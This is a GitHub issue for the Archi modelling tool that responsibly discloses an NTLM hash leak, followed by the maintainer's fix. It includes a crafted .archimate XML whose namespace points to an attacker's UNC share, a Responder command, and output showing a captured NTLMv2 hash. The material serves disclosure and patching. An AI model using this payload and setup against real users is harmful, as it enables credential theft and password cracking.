Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

NTLM Hash Disclosure (v5.0.2) #946

Closed
ncsc-pt opened this issue Jul 14, 2023 · 4 comments
Closed

NTLM Hash Disclosure (v5.0.2) #946

ncsc-pt opened this issue Jul 14, 2023 · 4 comments

Comments

@ncsc-pt
Copy link

ncsc-pt commented Jul 14, 2023

Version of Archi

5.0.2

Description

When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest account, the host will try to authenticate on the share using the current user's session.

Impact

A malicious user can capture NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.

Technical fix

Do not allow the application’s functionality to resolve or load UNC paths.

Technical Details

“archimate” project are saved as XML file using the extension .archimate . The below example is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is place on the diagram “Default View” (link by the ID
e79145c...).

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
  <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
  <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
  </folder>
  <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
  <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
  <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
  <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
  <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
  <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
  <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
    <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
      <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
        <bounds x="571" y="332" width="120" height="55"/>
      </child>
    </element>
  </folder>
</archimate:model>

The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC is provided, the host will try to access the share drive and if need be, try to authenticate.

In the following example, the attacker is running the Responder tool ( Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \172.16.227.1\share\archimate.

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
[...]

Whenever the victim is opening the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.

sudo ./Responder.py -I vmnet8
[...]
[+] Listening for events...
[...]
[SMB] NTLMv2-SSP Client: 172.16.227.169
[SMB] NTLMv2-SSP Username : LAB\tester
[SMB] NTLMv2-SSP Hash:
test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]

As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.
@Phillipus Phillipus mentioned this issue Jul 14, 2023
Closed
@Phillipus
Copy link
Member

Thanks for the report. This is under investigation.

See eclipse-emf/org.eclipse.emf#8

Phillipus added a commit that referenced this issue Jul 14, 2023
@Phillipus
Set OPTION_USE_PACKAGE_NS_URI_AS_LOCATION to false
bcab676 
- See #946
@Phillipus
Copy link
Member

This will be addressed in the next version of Archi.

Thanks.

@Phillipus
Copy link
Member

Fixed in Archi 5.1 beta 2.

@ncsc-pt
Copy link
Author

ncsc-pt commented Jul 18, 2023

Thanks for the quick response! 💪

@ncsc-pt ncsc-pt closed this as completed Jul 18, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Phillipus @ncsc-pt